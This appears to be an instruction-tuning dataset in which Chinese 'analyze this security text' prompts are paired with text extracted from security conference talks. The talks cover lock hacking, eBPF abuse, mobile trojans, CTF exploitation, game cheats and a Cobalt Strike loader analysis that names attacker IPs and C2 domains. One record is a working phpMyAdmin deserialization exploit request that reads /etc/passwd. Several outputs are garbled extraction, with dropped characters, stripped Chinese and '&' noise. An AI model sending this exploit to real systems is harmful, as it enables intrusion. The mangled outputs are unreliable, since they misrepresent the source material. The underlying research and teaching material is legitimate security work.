{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking BLE Bicycle Locks for Fun & A Small Profit 1 whoami  From Sunny Singapore  Senior Security Consultant @ MWR  Mobile and Wireless geek  BlackHat USA 2016  Bad for Enterprise: Attacking BYOD Enterprise Mobile Security Solutions 2 Bike-Sharing Economy and the BLE Smart Lock 1 Overview 3 Building a Master Key 3 Demo 4 Analyzing Communications 2 Major Players Major Players 6 Country China China Singapore Founded 2014 2015 2017 Operations 20 Countries 16 Countries 22 Countries Cost SGD$0.50/30min Bluetooth Low Energy Generic Access Profile (GAP)  Peripheral Small low powered device e.g. bicycle lock  Central High powered computing device e.g. Mobile Phone Bluetooth Low Energy 8 Generic Attribute Profile (GATT)  Services Groups of Characteristics 16/128-bit UUID  Characteristics A single data point 16/128-bit UUID Major Components 9 Personal BLE Bicycle Lock Lock Decomposition Motor to release lock Logic Controller / BLE Notch Spring Mechanism Notch Pin Noke Lock Services and Characteristics Ubertooth One  Wireshark Capture Major Components 19 iOS CoreBluetooth CBPeripheral  Remote peripheral devices that the app has discovered advertising or is currently connected to.  -m \"*[CBPeripheral readValue*]\"  -m \"*[CBPeripheral writeValue*]\"  -m \"*[CBPeripheral setNotifyValue*]\" CBPeripheralDelegate  Provides methods called on events relating to discovery, exploration, and interaction with a remote peripheral.  -m \"*[* *didUpdateNotificationStateForCharacteristic*]\"  -m \"*[* *didUpdateValueForCharacteristic*]\" 20 Summary Scan QR Code 01 02 Get Lock Key From Server 04 Request Encrypted Token 05 Gets Encrypted Token 06 Decrypt Token & Unlock! 03 Server Responds with Lock Key oBike 22 oBike Lock oBike lock teardown and rebuild, dockless share bike rescue: https://youtu.be/Vl3Gl8w8n-Q 24 02 App Checks Lock Status. Uploads Coordinates. 04 App Requests Key Source 05 App Gets Key Source 06 Request Unlock Key 07 Server Responds with Unlock Key 08 Unlock Bike Lock 03 Server Respon", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nINSECURITY ENGINEERING: Locks, Lies, and Videotape LOCK DESIGN: MECHANICAL v. SECURITY ENGINEERING  PRIOR DefCon PRESENTATIONS  Vulnerabilities in mechanical and electro- mechanical locks  Resulted from Defective or Deficient engineering  All-encompassing standards problem  Failure to understand why locks can be opened, rather than how INSECURITY ENGINEERING  DEFICIENT OR DEFECTIVE PRODUCTS  Intersection of mechanical and security engineering  FALSE SENSE OF SECURITY  What appears secure is not  How do you know the difference?  Undue reliance on standards  MISREPRESENTATIONS BY MFG SPECIFIC DESIGN FAILURES  KWIKSET SMART KEY  KABA IN-SYNC  AMSEC ELECTRONIC SAFE ES813  ILOC ELECTRO-MECHANICAL LOCK  BIOLOCK FINGERPRINT LOCK  Examine each lock for security vulnerability  Statements from the manufacturers about their security LOCKS: THE FIRST LINE OF DEFENSE  LOCKS: FIRST SECURITY BARRIER  OFTEN, THE ONLY SECURITY LAYER  MEASURED BY STANDARDS  WHAT IF NOT RATED BY UL or BHMA  HOW DO YOU KNJOW THAT LOCKS ARE SECURE?  WHAT DOES SECURE MEAN? MANUFACTURER RESPONSIBILITIES  UNIQUE RESPONSIBILITY FOR COMPETENCE  MECHANICAL ENGINEERING  SECURITY ENGINEERING  IMPLIED REPRESENTATIONS  WE ARE EXPERTS  SECURITY OF THEIR PRODUCTS  REPRESENTATIONS  WE MEET OR EXCEED STANDARDS EXPERTISE REQUIRED IN LOCK DESIGN  MECHANICAL ENGINEERING  SECURITY ENGINEERING  MINIMUM INDUSTRY STANDARDS REQUIRE LEVEL OF KNOWLEDGE  SECURITY ENGINEERING REQUIRES:  UNDERSTAND USE OF WIRES, MAGNETS, PAPERCLIPS, BALL POINT PENS, ALUMINUM FOIL  BYPASS TECHNIQUES ENGINEERING FAILURES: RESULTS AND CONSEQUENCES  INSECURITY ENGINEERING  Insecure products  Often easily bypassed  Use standards as the measure when they do not address the relevant issues  Products look great but not secure  False sense of security COST AND APPEARANCE v. QUALITY AND SECURITY  DO YOU GET WHAT YOU PAY FOR?  2$ LOCKS ARE 2$ LOCKS!  SHORTCUTS DO NOT EQUAL SECURITY  CLEVER DESIGNS MAY REDUCE SECURITY  PATENTS NOT GUARANTEE SECURITY SECURITY", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvil eBPF Practical Abuses of an In-Kernel Bytecode Runtime Jeff Dileo DEF CON 27 call_usermodehelper(\"/bin/sh\",(char*[]){\"/bin/sh\",\"-c\",\"whoami\",NULL},NULL,5)  @chaosdatumz  Agent of chaos  Unix aficionado  Principal Consultant / Research Director @ NCC Group  I like to do terrible things to/with/in:  programs  languages  runtimes  memory  kernels  packets  bytes  ... Outline  Introduction to eBPF  On Using eBPF for Malign Purposes  Tooling Up to Build a Birdfeeder (of Dooooom!)  The IPC You Dont See  Reliable Corruption  On Fighting Wizards and Dragons  Q&A eBPF  Background  extended BPF  What is BPF? BPF  Berkeley Packet Filter  Limited instruction set for a bytecode virtual machine  Originally created to implement FAST programmatic network filtering in kernel  has a few (2) 32-bit registers (and a hidden frame pointer)  load/store, conditional jump (forward), add/sub/mul/div/mod, neg/and/or/xor, bitshift BPF  tcpdump -i any -n 'tcp[tcpflags] & (tcp-syn|tcp-ack) != 0' (000) ldh [14] (001) jeq #0x800 jt 2 jf 10 (002) ldb [25] (003) jeq #0x6 jt 4 jf 10 (004) ldh [22] (005) jset #0x1fff jt 10 jf 6 (006) ldxb 4*([16]&0xf) (007) ldb [x + 29] (008) jset #0x12 jt 9 jf 10 (009) ret #262144 (010) ret #0 eBPF  extended Berkeley Packet Filter  designed to be JITed with one to one mapping  originally designed with the possible goal in mind to write programs in restricted C  socket filters, packet processing, tracing, internal backend for classic BPF, and more...  Many different APIs exposed through the bpf(2) syscall  The main ones are for loading/interacting with eBPF programs and maps  Programs can be one of several types  Maps are in-kernel structures shared between kernel space eBPF code and userspace program code eBPF  High Level Overview  eBPFs virtual ISA is featureful enough to support C  The kernel places restrictions on eBPF programs to prevent it from breaking the kernel  eBPF programs are created through the bpf(2) syscall  Pass in an array of eBPF instructions a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity)Auditing)Mobile)Apps) ! DEF)CON)23! Sat.,)Aug)9,)2015)9C1! Sam)Bowne) City)College)San)Francisco! Slides)and)projects)at)samsclass.info) Adding&Trojans&to&Apps& Slides'and'projects'at'samsclass.info' Android&is&#1&  80%&market& share&in&2014&  Link&Ch&4a& Slides'and'projects'at'samsclass.info' App&Signing&  All&apps&must&be&signed&to&be&installed,&BUT&  Android&allows&selfEsigned&cerGficates&  Google&Play&is&the&\"official\"&app&store,&BUT&  Google&doesn't&police&it&well&  Apps&can&be&installed&from&email,&Web&pages,&etc.& Slides'and'projects'at'samsclass.info' Android&Debug& Bridge&  CommandEline&tool&  Allows&you&to&communicate&with&a&mobile& device&via&a&USB&cable&or&an&SVD&running& within&an&emulator&  Connects&to&device's&daemon&running&on&TCP& port&5037& Slides'and'projects'at'samsclass.info' Useful&ADB&Commands&  push&  Copies&a&file&from&your&computer&to&the&mobile& device&  pull&  Copies&a&file&from&the&mobile&device&to&your& computer&  logcat&  Shows&logging&informaGon&on&the&console&  Useful&to&see&if&an&app&or&the&OS&is&logging& sensiGve&informaGon& Slides'and'projects'at'samsclass.info' Useful&ADB&Commands&  install&  Copies&an&applicaGon&package&file&(APK)&to&the& mobile&device&and&installs&the&app&  Useful&for&sideEloading&apps&(so&you&don't&have&to& use&Google&Play)&  shell&  Starts&a&remote&shell&on&the&mobile&device&  Allows&you&to&execute&arbitrary&commands& Slides'and'projects'at'samsclass.info' Decompiling&and&Disassembly& Slides'and'projects'at'samsclass.info' StaGc&Analysis&  Source&code&is&generally&kept&confidenGal&by& app&developers&  A&binary,&compiled&app&can&be&analyzed&by& disassembling&or&decompiling&them,&into&  Smali&assembly&code&(used&by&Dalvik&VM),&or&  Java&code& Slides'and'projects'at'samsclass.info' Slides'and'projects'at'samsclass.info' TD&Ameritrade&  No&obfuscaGon& Slides'and'projects'at'samsclass.info' Bank&of&America&  ProGuard&Free&Obfuscator&  Worthless& Slides'and'projects'at'samsclass.info' Java&v.&Smali&Code& Slides'a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 网络信息搜集技巧 - 公开渠道 - 目标 Web 网页地理位置相关组织 - 组织结构和人员个人资料电话电子邮件 - 网络配置安全防护机制的策略和技术细节 - 通过搜索引擎查找特定安全漏洞或私密信息的方法 - [Google Hacking Database](https://www.exploit-db.com/google-hacking-database/) - 科学上网 ### 信息搜集技术的基本搜索技巧 - Google 基本搜索与挖掘技巧 - 保持简单明了的关键词 - 使用最可能出现在要查找的网页上的字词 - 尽量简明扼要地描述要查找的内容 - 选择独特性的描述字词 - 社会公共信息库查询 - 个人信息人口统计局 - 企业等实体YellowPage企业信用信息网 - 网站域名IPwhois 等 ### 信息搜集技术关于地图和街景搜索 - 国外Google MapGoogle EarthGoogle Street View - 国内百度地图卫星地图街景 - 从网络世界到物理世界IP2Location - whois 数据库 - GeoIP - IP2Location - 纯真数据库QQ IP 查询", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n目录 目录 目录 目录 1.概述3 2.输入验证和输出显示3 2.1命令注入4 2.2跨站脚本4 2.3文件包含5 2.4代码注入5 2.5 SQL 注入6 2.6 XPath 注入6 2.7 HTTP 响应拆分6 2.8文件管理6 2.9文件上传7 2.10变量覆盖7 2.11动态函数7 3.会话安全8 3.1 HTTPOnly 设置8 3.2 domain 设置8 3.3 path 设置8 3.4 cookies 持续时间8 3.5 secure 设置8 3.6 session 固定9 3.7 CSRF 9 4.加密9 4.1明文存储密码9 4.2密码弱加密9 4.3密码存储在攻击者能访问到的文件9 5.认证和授权10 5.1用户认证10 5.2函数或文件的未认证调用10 5.3密码硬编码10 6.随机函数10 6.1 rand() 10 6.2 mt_srand()和 mt_rand() 11 7.特殊字符和多字节编码11 7.1多字节编码11 8. PHP 危险函数11 8.1缓冲区溢出11 8.2 session_destroy()删除文件漏洞12 8.3 unset()-zend_hash_del_key_or_index 漏洞12 9.信息泄露13 9.1 phpinfo 13 10. PHP 环境13 10.1 open_basedir 设置13 10.2 allow_url_fopen 设置13 10.3 allow_url_include 设置13 10.4 safe_mode_exec_dir 设置14 10.5 magic_quote_gpc 设置14 10.6 register_globals 设置14 10.7 safe_mode 设置14 10.8 session_use_trans_sid 设置14 10.9 display_errors 设置14 10.10 expose_php 设置14 概述 概述 概述 概述 代码审核是对应用程序源代码进行系统性检查的工作它的目的是为了找到并且修复应 用程序在开发阶段存在的一些漏洞或者程序逻辑错误避免程序漏洞被非法利用给企业带来不必 要的风险 代码审核不是简单的检查代码审核代码的原因是确保代码能安全的做到对信息和资源进 行足够的保护所以熟悉整个应用程序的业务流程对于控制潜在的风险是非常重要的审核人员 可以使用类似下面的问题对开发者进行访谈来收集应用程序信息 应用程序中包含什么类型的敏感信息应用程序怎么保护这些信息的 应用程序是对内提供服务还是对外哪些人会使用他们都是可信用户么 应用程序部署在哪里 应用程序对于企业的重要性 最好的方式是做一个 checklist让开发人员填写Checklist 能比较直观的反映应用程序的 信息和开发人员所做的编码安全它应该涵盖可能存在严重漏洞的模块例如数据验证身份 认证会话管理授权加密错误处理日志安全配置网络架构 输入验证和输出显示 输入验证和输出显示 输入验证和输出显示 输入验证和输出显示 大多数漏洞的形成原因主要都是未对输入数据进行安全验证或对输出数据未经过安全处 理比较严格的数据验证方式为 对数据进行精确匹配 接受白名单的数据 拒绝黑名单的数据 对匹配黑名单的数据进行编码 在 PHP 中可由用户输入的变量列表如下 $_SERVER $_GET $_POST $_COOKIE $_REQUEST $_FILES $_ENV $_HTTP_COOKIE_VARS $_HTTP_ENV_VARS $_HTTP_GET_VARS $_HTTP_POST_FILES $_HTTP_POST_VARS $_HTTP_SERVER_VARS 我们应该对这些输入变量进行检查 命令注入 命令注入 命令注入 命令注入 PHP 执行系统命令可以使用以下几个函数systemexecpassthru``shell_exec popenproc_openpcntl_exec 我们通过在全部程序文件中搜索这些函数确定函数的参数是否会因为外部提交而改变 检查这些参数是否有经过安全处理 防范方法 使用自定义函数或函数库来替代外部命令的功能 使用 escapeshellarg 函数来处理命令参数 使用 safe_mode_exec_dir 指定可执行文件的路径 跨站脚本 跨站脚本 跨站脚本 跨站脚本 反射型跨站常常出现在用户提交的变量接受以后经过处理直接输出显示给客户端存储 型跨站常常出现在用户提交的变量接受过经过处理后存储在数据库里然后又从数据库中读取 到此信息输出到客户端输出函数经常使用echoprintprintfvprintf<%=$test%> 对于反射型跨站因为是立即输出显示给客户端所以应该在当前的 php 页面检查变量被 客户提交之后有无立", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCTF For Beginner bananaapple $whoami?  bananaapple  交通大學資工系大四  從開始學習資安到現在約一年  專長 : Binary exploit  目前為 Bamboofox 中的一員  曾經參與的比賽  CTCTF ( 台交駭客搶旗賽 )  Bosten key party CTF 2015  DEF CON CTF Qualifier 2015  HoneyMe CTF   故事的開始 DESCRIPTION 這是專在講 \"程式不安全\" 的課程也建立一個 wargame.cs.nctu.edu.tw 的專屬網站這門課最早在96年開設中 間斷了幾年去年恢復開課但講師力不從心宣示是最後一次 直到最近學生們很爭氣地加入 HITCON 戰隊與 CHROOT台 科大台大等學生合力打到世界駭客年會的亞軍表示很希望維持 這股氣勢同時響應科技部次長的宣示要祕密培訓學生於是 重啟程式不安全的課程 故事的開始 一點開課程網頁 講師: 大家可以開始了 蛤? 不會吧 連題目都看不懂 講師: 可以先做第三題, 很簡單的 最後實在是受不了 才去問講師要做什麼 telnet secprog.cs.nctu.edu.tw 10003 ( 當初連 nc 是什麼都不知道 ) 才開始解題 當初想說要是兩個禮拜內沒解出任何一題 就放棄吧 ROP 給你固定的 instructions 選項 組合 instructions 來合成三個 system call open -> read -> write open /home/rop/flag open return file fd read file fd to buffer write buffer to STDOUT ROP 當初的 payload 1,13,13,11,9,7,7,12,4,2,2,8,8,0,12,13,1,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8, 8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,13,9,6, 9,13,4,4,8,12,12,12,12,12,0,9,12,3,1,8,8,0 SECPROG{return_oriented_programming_is_easy!} 這是我最初解出的 wargame 後來又問了那要怎麼看 binary 旁邊就有一個人回說用 objdump 看阿 我用 objdump 一行一行看組語看了四五個禮拜後才知道有 IDA PRO 這種工具 X當初到底是誰說用 objdump 看 binary 的 只是也意外地學習到一項技能 打 CTF 的時候有些題目需要能夠直接看組語的能力 因為IDA PRO 翻出的 c code 可能會不正確 就可以直接看 assembly 去驗證 IDA PRO簡介  強大的反組譯工具  Hex-Rays decompiler plugin CTF  全名為 Capture The Flag 簡稱為 CTF  是目前網路當紅的資安競賽  培育資安人才之搖籃  主要的類型  Jeopardy  Attack And Defense  King of the Hill Jeopardy Jeopardy  Jeopardy 為一種遊戲進行方式中譯答題賽  題目由主辦單位公布  哪個 service 開在哪個 IP 的哪個 port  題目的基本資訊hint  提供 binary 檔案下載 Attack And Defense Attack And Defense Attack And Defense  每支隊伍負責維護一台 server ( gamebox ) 上的數個 service  遊戲目的大致可以分為兩種  維護 service : 能夠獲得基本分數  修補漏洞 : 不影響正常程式行為的情況下進行修補 ( binary patch )  攻擊服務 : 被入侵的一方會扣分, 扣的分數平均分給入侵的隊伍 Attack And Defense  通常一個 service 會存在很多個漏洞  在家目錄底下會有 flag 檔案  每過一個 round flag 會更新  監聽網路流量分析封包並修補漏洞以及重送別隊的 payload  植入後門持續性地送 flag 回來 King of the Hill King of the Hill  和 Attack And Defense 比較相近的類型  佔領的時間越久得到的分數越多  有些類型可以把自己的 binary 寫到主機上  或是把自己的 key 寫到首頁上 第一次的CTF 學長後來看我蠻認真地在學習 就邀我跟他們 (", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 IDAburp 1. 2. 3. 4. vpnvpn 0x01 1. IAM 2. idedr 3. 4. ipurl wafids 5. 0x02 1. SDP 2. NIST 3. SDP SDP SDPSDP SDPSDPSDP agentagentSDP iptablesipSDP agentipiptablesip SDP NIST NIST (PDP)(PEP) NISTISOAccess management-AMPDPPEP NISTPDP/PEP NISTPDPSDPPEPSDPagent 0x03 sxfatrustatrustvpn VPN ip vpn vpn atrustedrsdk atrustmacID edr atrust edrwafhips atrustatrustvpnvpn vpn agent atrustsdp atrust 0x04 vpn vpnvpn vpnweb web vpnvpnipvpn sslvpnatrust sslvpnvpnvpn SPA 1. udpudpip 2. ssl atrust SPA SDP 0x05 POP sasecdn pop poppopatrust poppop", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTenProtect Conficential, Copyright @Tencent, 2019 游戏安全的攻防艺术 joeywzhu@tencent.com 2019.02 TenProtect Conficential, Copyright @Tencent, 2019 个人简介  2013 至今腾讯游戏业务安全部技术专家  2005-2012 趋势科技架构师  2005-2008, 开发和设计 PE 病毒沙箱  2008-2012, 开发和设计脚本漏洞分析引擎  2013 to now, 开发和设计游戏安全通用方案  2011.8 Defcon 讲演  Chinese phishing at Defcon19, Las Vegas TenProtect Conficential, Copyright @Tencent, 2019 1. 外挂是什么 TenProtect Conficential, Copyright @Tencent, 2019 多少秒扫雷能够完成 1s 1s TenProtect Conficential, Copyright @Tencent, 2019 CrossFire 透视外挂 TenProtect Conficential, Copyright @Tencent, 2019 注 : 为了适应手游屏幕特点手游上的外挂增加了射线 CrossFire 手游透视外挂 TenProtect Conficential, Copyright @Tencent, 2019 外挂的发展史  单机游戏 CheatEngine/FPE  网络游戏  脱机挂 (WPE/WireShark)  加速 / 倍攻 ( 数值异常 )  透视 / 自瞄 (Hook, 驱动 )  炸房 / 强登  打金工作室 / 代充 / 代练  手游模拟器 TenProtect Conficential, Copyright @Tencent, 2019 目前中国的外挂行业运作模式 TenProtect Conficential, Copyright @Tencent, 2019 中国网游作弊用户分布  越热门的游戏作弊越多  一些作弊软件卖的很贵  绝大作弊者都是新进玩家  60% 作弊发生在网吧  由于 PUBG 的影响 fps 作弊 现在非常流行 TenProtect Conficential, Copyright @Tencent, 2019 FPS 游戏作弊的爆发  PUBG  在 2108 年超过 2700 款外挂被监控到  高峰期每天超过 100 款外挂进行更新  FPS  2018 年大约有 60 款以上的 FPS 生存游戏  所有的游戏都发现有外挂的存在  APEX  自 02-05 发布以来 72 小时超过 1000 万玩家  已经发现超过 60 外挂在售卖 TenProtect Conficential, Copyright @Tencent, 2019 月入宝马不是梦 TenProtect Conficential, Copyright @Tencent, 2019 2. 外挂技术原理的讨论 TenProtect Conficential, Copyright @Tencent, 2019 安全领域的大讨论  软件漏洞  游戏 bug 复制金币  客户端逻辑没有服务器验证  盗版问题  网络安全  报文篡改  DDOS 攻击  服务器数据安全  服务器入侵  SQL 注入 / 回档 TenProtect Conficential, Copyright @Tencent, 2019 暗黑 3 漏洞 - 金币复制 TenProtect Conficential, Copyright @Tencent, 2019 内存修改型  游戏对象属性  血量攻击力怪物等等  修改或调用游戏逻辑  碰撞检测自动瞄准  游戏资源文件  手游 / 弱联网  本地效果 TenProtect Conficential, Copyright @Tencent, 2019 LOL 改模型 TenProtect Conficential, Copyright @Tencent, 2019 堡垒之夜 / 人物透视 TenProtect Conficential, Copyright @Tencent, 2019 脱机挂 / 协议模拟  端游  UnReal Engine( 开源 )  外挂工作室  页游  Fiddle  手游  离线 PUBG Radar show player position at mobile though proxy hijack TenProtect Conficential, Copyright @Tencent, 20", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction to Unicornscan Introducing Unicornscan RIDING THE UNICORN Unicornscan is an open source (GPL) tool designed to assist with information gathering and security auditing. This talk will contrast the real world problems weve experienced using other tools and methods while demonstrating the solutions that Unicornscan can provide. For the latest copy of this talk go to http://www.dyadlabs.com/defcon05.pdf Presented By: Robert E. Lee & Jack C. Louis Introducing Unicornscan  Dyad Labs, Inc. Introduction to Unicornscan Outline 1 Introduction to Unicornscan Scatter Connect Unicornscan - History, Background, & Technical Details Demo Robert E. Lee & Jack C. Louis Introducing Unicornscan  Dyad Labs, Inc. Introduction to Unicornscan Scatter Connect Unicornscan - History, Background, & Technical Details Demo Speakers Speakers: Robert E. Lee CEO, Dyad Labs, Inc. Director of Projects and Resources, ISECOM OPST & OPSA Certified Trainer Jack C. Louis Chief Security Researcher, Dyad Labs, Inc. Systems Programmer OPST & OPSA Certified Trainer Anthony de Almeida Lopes Intern, Dyad Labs, Inc. Robert E. Lee & Jack C. Louis Introducing Unicornscan  Dyad Labs, Inc. Introduction to Unicornscan Scatter Connect Unicornscan - History, Background, & Technical Details Demo 3-way Handshake Connect Picture Robert E. Lee & Jack C. Louis Introducing Unicornscan  Dyad Labs, Inc. Introduction to Unicornscan Scatter Connect Unicornscan - History, Background, & Technical Details Demo Scatter Connect Picture Robert E. Lee & Jack C. Louis Introducing Unicornscan  Dyad Labs, Inc. Introduction to Unicornscan Scatter Connect Unicornscan - History, Background, & Technical Details Demo Scatter Connect Explained Move TCP connection state tracking out of kernel space and into user space One process is the master control (Unicornscan). Keeps track of what packets need to be sent Who can send them The responses that have come back connection state. A second process is the sender (unisend). Assembles the p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 个图标伪装上线分析 事件背景 分析经过 并不简单 娱乐下 IOC 加社区 某重要活动结束前天安全的与盾星球内部交流群有位蓝队兄弟扔出来三个公鸡队样本让群还 在的师傅帮忙分析下由此便展开了下的分析经过 先拿到样本之后file命令做简单识别file能识别的件格式还是很多的但这三个样本不巧被公 鸡队做了脚已经混淆了件头 010Editor打开件简单查看了下发现件当中存在明字符串整体来说此时样本较奇怪 事件背景 分析经过 2 这时候坤佬wonderkun在群来了句看出来件混淆的式了0xEE异或即可得到混淆前的原 件具体原理坤佬解释这是统计学不知道异或的密钥是个字节所以要统计单字节双字节和四 字节 由于pe件中出现最多的是 0x00 所以按照单字节统计出现次数最多的就密钥双字节四 字节以此类推 看下此时件的头部的分布的确0xEE出现次数最多坤佬太强了学到了 3 按照坤佬的统计并且结合件后半部分存在明可得知只是头部数据被0xEE异或混淆概在 010Editor中查看数据后发现前0x400字节存在问题所以只需要对前0x400字节做0xEE异或即可 4 去除头部的混淆之后1件为EXEconsole程序2件为DLL3件依然是未知格式 并且1.exe为微软签名的程序结合2件为DLL3件未知以及常的恶意软件loader加载式这 猜测2.dll为恶意DLL程序通过运1.exe实现加DLL劫持再加载运3样本中实际的后指令 通过进步分析1.exe为MpRunCmd.exe2.dll应该为mpclient.dll 5 所以这的mpclient.dll应该就是恶意软件的loader所在模块IDA中直接载分析后发现所有导出函 数都会调loader的加载函数这样做可以保证loader定会被执 6 接着对loader函数进分析先是调ShowWindow隐藏MpCmdRun.exe进程的窗 然后是获取程序的件名不过这个Filename始终没有被到猜测应该是之前从些功能函数copy 的代码没有删除不必要的函数调 最后是loader的主要函数以字符串\"kuailele\"为解密key解密件当中的后指令并加载 7 跟进函数sub_180001870先是对明字符串进加密解密最后还是明字符串这搞不懂作 者想啥 此时得到的v2依然为宽字符串\"C:\\ProgramData\\TU.IO\"接下来调sub_180001710并传v2经过 调试分析作者实现了GetProcAddress函数采计算字符串Hash并较的式规避调系统 GetProcAddress以及隐藏导表函数的敏感特征函数sub_180001710的实际作是读取传件名 也就是C:\\ProgramData\\TU.IO到Func程序全局变量当中 8 接下来调sub_180001680函数对读取的件内容进解码 跟进函数sub_180001680发现函数第个参数是需要解码的buffer第个参数为buffer的度第三 个参数也就是a1这是\"kuailele\"为key第四个参数为key的度并且以key的度-1为循环 度对buffer的数据进异或解码这存在个问题key的最后个字节没有被到猜测可能是作 者编写程序循环度判断有些问题这正常应该以key的全部度为循环异或解码 9 接下来动态获取函数VirtualProtect并调修改Func指向地址的内存属性为64也就是 PAGE_EXECUTE_READWRITE 10 最后通过EnumObjects回调执Func指向内存的指令 为了验证分析的结果是否正确这笔者星球专版CS IceRiver成个64位的beacon.bin件并 以\"kuailele\"为key通过循环异或对beacon.bin进编码将编码后的件复制 到\"C:\\ProgramData\\TU.IO\"件当中然后双击执1.exe观察IceRiver是否收到beacon权限 11 可以看到成功接收到了beacon权限且所在进程为1.exe这说明分析是正确的 上分析的是加loader的处理过程奇怪的问题是即使对样本3件进循环异或编码获取到的 件依然是未知格式并且在010Editor当中也看不到任何明数据这说明样本3应该还有其他混淆的存 在群那位蓝队的师傅说这三个件是通过钓反向溯源到的远程件也就是说很可能在钓 当中存在对样本3的解码过程 并不简单 12 先按照群师傅提供的信息这三个样本是在http://112.74.109.76:5559/下载到的 确定是回连到CobaltStrike监听器且回连地址为https://service-baw5g4iz- 1309608249.bj.apigw.tencentcs.com攻击者通过图标伪装的式诱导标户点击诱饵.exe上线 由于已经确定是CobaltStrike C2所以这先决定对teamser", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHost-based Intrusion Prevention on Windows and UNIX Dr. Rich Murphey White Oak Labs WHITE OAK LABS 2 DEFCON XI 8/3/2003 Acknowledgements  Niels Provos  OpenBSDs systrace  DT  suggested this thread last year  Greg Hoglund  insights  md5 at da ghettohackers  reviews WHITE OAK LABS 3 DEFCON XI 8/3/2003 What is Intrusion Prevention?  To a netsec person it looks like a firewall. Messages Rules Messages (Packets) WHITE OAK LABS 4 DEFCON XI 8/3/2003 What is Intrusion Prevention?  To a AV person it looks like an AV. Messages Signatures Messages (File IO) WHITE OAK LABS 5 DEFCON XI 8/3/2003 What is Intrusion Prevention? Network-based Host-based Packets Signatures API() Signatures WHITE OAK LABS 6 DEFCON XI 8/3/2003 What is Intrusion Prevention? Packets Signatures Socket() Signatures Consider personal firewalls that combine host and network based filtering. WHITE OAK LABS 7 DEFCON XI 8/3/2003 How is IP different?  Rather than rules, it uses signatures.  But these arent the same signatures you might run in an Intrusion Detection Systems (IDS)  Signatures as access controls. API() Signatures WHITE OAK LABS 8 DEFCON XI 8/3/2003 How is it different?  Consider SNORT/Hogwash..  Signature-based Firewall  IDS vendors call this Gateway IDS Packets Signatures WHITE OAK LABS 9 DEFCON XI 8/3/2003 What is Intrusion Prevention?  It's complementary to AV & Firewall  Filters messages between applications and the kernel.  Uses signatures to recognize payload behavior or injection mechanisms. API() Signatures WHITE OAK LABS 10 DEFCON XI 8/3/2003 Why the heck should we care?  Encryption, fragmentation and re- encoding, can prevent application layer filtering on the wire.  Data resides in the clear in the application layer. So do exploits. WHITE OAK LABS 11 DEFCON XI 8/3/2003 Why the heck should we care?  Visibility into the application layer provides capability for better contextual discrimination. = Stops certain kinds of exploits. WHITE OAK LABS 12 DEFCON XI 8/3/2003 So, why do we need anothe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433) [中文版本(Chinese version)](README.zh-cn.md) Affected version: 2.x ## Setup Run the following command to start phpmyadmin: ``` docker compose up -d ``` Visit `http://your-ip:8080` and you will see the phpmyadmin home page. Because there is no connection to the database, we will get an error. But this vulnerability is not related to the database, so just ignore. ## Exploit Send the following package to read `/etc/passwd`: ``` POST /scripts/setup.php HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 80 action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";} ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploit Archaeology First in the series of talks on excavating and exploiting retro hardware. I promise the talk will get technical. Who am I?  Penetration Tester  Geek Dad  Amateur Phone Phreak  @savant42 on the twitters Who Im not.  Leet.  A programmer.  A reverse engineer-er.  A speller. Why this talk? From 50lb Weight to Stealth Attack Platform Methodology > Results The Journey And to see if I could. First Off... Traveling with a Payphone is a giant pain in the ass. Anyway. Payphones used to be like this. Nowadays theyre like this. If you see a payphone in your neighborhood today, you laugh. If you see someone using a payphone? You lock your car doors and roll up the windows. Even Indy is over it. Ever since I was a kid Ive always wanted my very own payphone One day, I got one as a gift. (Thanks Tiffany & Gene Erik) Still popular in correctional facilities This one came from a prison. No joke. (Yes, I cleaned the ever loving shit out of it)  BOCOT = Bell Owned Coin Operated Telephone (Telco Owned)  COCOT = Customer Owned Coin Operated Telephone (Private) BOCOT vs. COCOT Bell Owned BOCOTS could be Red Boxed (utilize inband ACTS tones to signal coin insertion) Its probably still possible in certain regions of the US but most RBOCs have outsourced to private companies. COCOT Payphones can not be Red Boxed without Operator Intervention (as far as *I* know) because they dont use ACTS With Smart Payphones all of the call regulation, coin counting and management, etc, is done inside the payphone. Telco payphones do all the magic at the Central Office. Telling the difference? Most (All?) BOCOT Payphones use the General Electric style housing Coin Return is on the Left and the armored cable connects to the front of the housing. COCOTS often use the GTE style housing with the coin return slot on the right and the armored cable connects on the side. This is 